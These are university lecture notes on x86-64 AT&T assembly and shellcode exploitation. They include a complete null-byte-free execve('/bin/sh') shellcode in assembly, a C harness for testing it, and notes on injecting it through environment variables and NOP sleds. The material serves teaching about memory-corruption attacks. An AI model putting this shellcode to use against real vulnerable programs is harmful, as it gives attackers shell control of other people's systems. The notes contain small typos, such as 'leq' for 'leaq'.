lectures.alex.balgavy.eu

Lecture notes from university.
git clone git://git.alex.balgavy.eu/lectures.alex.balgavy.eu.git
Log | Files | Refs | Submodules

Lecture 6_ assembly, shellcode exploits.md (8762B)


      1 +++
      2 title = "Lecture 6: assembly, shellcode exploits"
      3 +++
      4 # Lecture 6: assembly, shellcode exploits
      5 
      6 ## Assembly
      7 We use x86 assembly, in AT&T notation (personal note: Intel is better for use though).
      8 - operand order: source, destination (Intel has the opposite)
      9 - symbol prefixes used (Intel doesn't have those)
     10 - `#` for comments (Intel uses `;`)
     11 - mnemonic suffix specifies operand size: b for byte, w for word (16 bits), l for long (32 bits), q for quad (64 bits) (Intel doesn't do this)
     12     - optional if one of operands is register
     13 
     14 Low-level, processor-specific symbolic language, directly translated to machine code.
     15 
     16 Intructions: simple operations like `mov %rax, %rbx` (copies value from register rax to register rbx)
     17 - form: `mnemonic source, destination` (mnemonic is short code telling CPU what to do)
     18 - number and type of operands depends on instruction, may be implicit
     19 - operand types:
     20     - register: `%rax`, `%rsp`, or `%al`
     21         - memory locations on CPU
     22         - types:
     23             - general purpose (to some extent): `%rax`, `%rbx`, `%rcx`, `%rdx`, `%rsi`, `%rdi`, `%r8`-`%r15`
     24             - stack pointer: `%rsp`
     25             - frame/base pointer: `%rbp`
     26             - flags register
     27             - instruction pointer: `%rip`
     28             - segment registers: `%cs`, `%ds`, `%es`, `%fs, etc.
     29             - system registers, model specific registers
     30             - instruction set registers
     31         - default register is 64-bit, can use smaller parts: `%eax` (32-bit), `%ax` (16-bit), `%ah` (8 high bits of `%ax`), `%al` (low 8 bits of `%ax`)
     32     - memory: `0x401000`, `8(%rbp)`, `(%rdx, %rcx, 4)`
     33         - max one explicit memory operand allowed
     34         - accessed by dereferencing pointers
     35         - specified as `offset(base, index, scale)`
     36             - computes and derefs `offset+base+index*scale`
     37             - `base`, `index`: 64-bit registers
     38                 - if `%rip`, symbolic displacement is relative to next instruction
     39             - `offset`: 32-bit constant or symbol, default 0
     40             - `scale`: 1, 2, 4, or 8 (default 1)
     41             - all parts optional
     42     - constants/immediates: prefixed with `$` (e.g. `$42`)
     43 
     44 Directives: commands for assembler
     45 - `.data`: section with variables
     46 - `.text`: section with code
     47 - `.byte`/`.word`/`.long`/`.quad`: integer (8/16/32/64 bits)
     48 - `.ascii`/`.asciz`: outputs string (without/with null terminator)
     49 
     50 labels: create symbol at current address (`foo: .byte 42` is similar to `global char foo = 42`)
     51 comments: prefixed with `#`
     52 
     53 Endianness: when storing an integer in memory, which byte is stored first
     54 - little end: least significant byte first (used by Intel)
     55 - big end: most significant byte first
     56 
     57 Signed integers:
     58 - Intel stores signed ints in 2's complement (most significant bit is made negative)
     59 - to flip sign, flip all bits and add 1
     60 - most operations identical between signed/unsigned, except:
     61     - comparisons need different condition code
     62     - different instructions for mul/div
     63 - to cast integer to larger size - size extension (most significant bit copied into all new bits)
     64 
     65 Common instructions:
     66 
     67 | example | meaning |
     68 |---|---|
     69 | mov src, dst | dst = src |
     70 | xchg dst1, dst2 | swap dst1 and dst2 |
     71 | push src | store src on top of stack |
     72 | pop dst | remove value from top of stack and store in dst |
     73 | add src, dst | dst += src |
     74 | sub src, dst | dst -= src |
     75 | inc dst | dst += 1 |
     76 | dec dst | dst -= 1 |
     77 | neg dst | dst = -dst |
     78 | cmp src1, src2 | set flags based on src2-src1 |
     79 | and src, dst | dst &= src |
     80 | or src, dst | dst \|= src |
     81 | xor src, dst | dst ^= src |
     82 | not dst | dst = ~dst |
     83 | test src1, src2 | set flags based on src1 & src2 |
     84 | jmp addr | jump to addr |
     85 | call addr | push return address, call function addr |
     86 | ret | pop return address, return there |
     87 | syscall | enter kernel to perform system call (based on registers) |
     88 | lea src, dst | dst = &src (src must be in memory) |
     89 | nop | do nothing |
     90 
     91 Conditional branching instructions (prepend 'n' to condition for opposite, e.g. `jne`)
     92 
     93 | example | meaning |
     94 |---|---|
     95 | je addr; jz addr | jump if result == 0 |
     96 | jb addr | jump if dst < src (unsigned) |
     97 | ja addr | jump if dst > src (unsigned) |
     98 | jl addr | jump if dst < src (signed) |
     99 | jg addr | jump if dst > src (signed) |
    100 | js addr | jump if result < 0 (signed) |
    101 
    102 Stack:
    103 - top of stack identified by stack pointer `%rsp`
    104 - entries on stack always 64 bits
    105 - push and pop implicitly store/load `%rsp`
    106 - stack grows downwards (push decrements `%rsp` by 8, pop increments `%rsp` by 8)
    107 - call and ret push/pop return address
    108 - function sets up stack frame in prologue, restores caller's stack frame in epilogue (but note: this depends on calling convention)
    109 - small parameters stored in registers (`%rdi`, `%rsi`, `%rdx`, `%rcx`, `%r8`, `%r9`), other parameters on stack right-to-left (but note: this depends on calling convention)
    110 - function prologue:
    111     1. push `%rbp`
    112     2. set `%rbp` to `%rsp`
    113     3. push callee-saved registers (`%r12`-`%r15`)
    114     4. decrement `%rsp` to make space for local vars
    115     5. save parameters t5.o local variables if needed
    116 - function epilogue:
    117     1. save return value (if any) in `%rax`
    118     2. set `%rsp` to `%rbp`
    119     3. pop callee-saved registers
    120     4. pop `%rbp`
    121     5. return to caller (uses top-of-stack as return address)
    122 
    123 ## Shellcode
    124 Assume we:
    125 - found vulnerability that allows overwriting return address
    126 - crafted input to trigger vulnerability
    127 
    128 Where do we point return address?
    129 - code that's already in program
    130 - code that we inject into the program
    131 
    132 x86 CPUs don't distinguish code and data, so if memory permissions allow:
    133 - we can read/write program code as data
    134 - we can execute data as program code
    135 
    136 How do we inject code into program?
    137 - specify as parameter
    138 - specify as environment variable
    139 - provide as input (if input stored in buffer)
    140 
    141 Injected code must:
    142 - work regardless of where it's stored in memory
    143 - not depend on external code like libraries
    144 - not contain any NULL bytes (would terminate if stored as string)
    145 - do something that gives attacker control of system
    146 
    147 User code can't start program, kernel does that.
    148 So tell kernel to do something using a syscall:
    149 - special instruction to switch to kernel
    150 - based on params stored in registers or memory, kernel performs required task
    151 - kernel returns to our program
    152 
    153 Starting a shell:
    154 - need execve system call to start program (the shell)
    155 - want to call `execve("/bin/sh", argv, NULL)`, where `char argv[] = { "/bin/sh", NULL}`
    156 - how without shared libraries (libc)?
    157     - `%rax` register stores which system call to invoke, `0x3b` is `execve`
    158     - `syscall` switch to kernel, result is stored in `%rax` after return
    159     - `retq` return to caller
    160 - so shellcode requirements are:
    161     - string "/bin/sh" in memory
    162     - array in memory, with pointer to "/bin/sh" and NULL pointer
    163     - pointer to string in `%rdi` (program name)
    164     - pointer to array in `%rsi` (`argv`)
    165     - NULL pointer in `%rdx` (`envp`)
    166 
    167 Shellcode:
    168 
    169 ```asm
    170 .data
    171 .globl shellcode
    172 shellcode:
    173     jmp code_start
    174 string_addr:
    175     .ascii "/bin/shNAAAAAAAABBBBBBBB"
    176 code_start:
    177     leq string_addr(%rip), %rdi     # load the string into %rdi ('path' in execve), offset is negative to avoid null bytes
    178     xorl %eax, %eax                 # clear %rax without using null bytes
    179     movb %al, 0x07(%rdi)            # replace "N" in string with null, use %rax to avoid explicit null
    180     movq %rdi, 0x08(%rdi)           # move program name to argv[0] in execve
    181     movq %rax, 0x10(%rdi)           # move null to argv[1] in execve, use %rax to avoid explicit null
    182     leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    183     movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    184     movb $0x3b, %al                 # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
    185     syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    186     .byte 0
    187 ```
    188 
    189 Testing shellcode:
    190 
    191 ```c
    192 #include <stdio.h>
    193 int main(int argc, char **argv) {
    194     extern char shellcode;
    195     void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    196     f();
    197     fprintf(stderr, "this shouldn't print\n");
    198     return -1;
    199 }
    200 ```
    201 
    202 Injecting the shellcode:
    203 - assume injection in env
    204     - injection in command line argument is similar
    205     - injection in input data is harder, but can use similar techniques (create and analyze program similar to vulnerable program)
    206     - one solution is NOP sled: when jumping anywhere in sequence of NOPs, end up at next instruction behind it
    207 - if we specify shellcode as env variable, we can compute its address (`bottom_of_stack-8-(strlen(progname)+1)-(strlen(shellcode)+1)`)
    208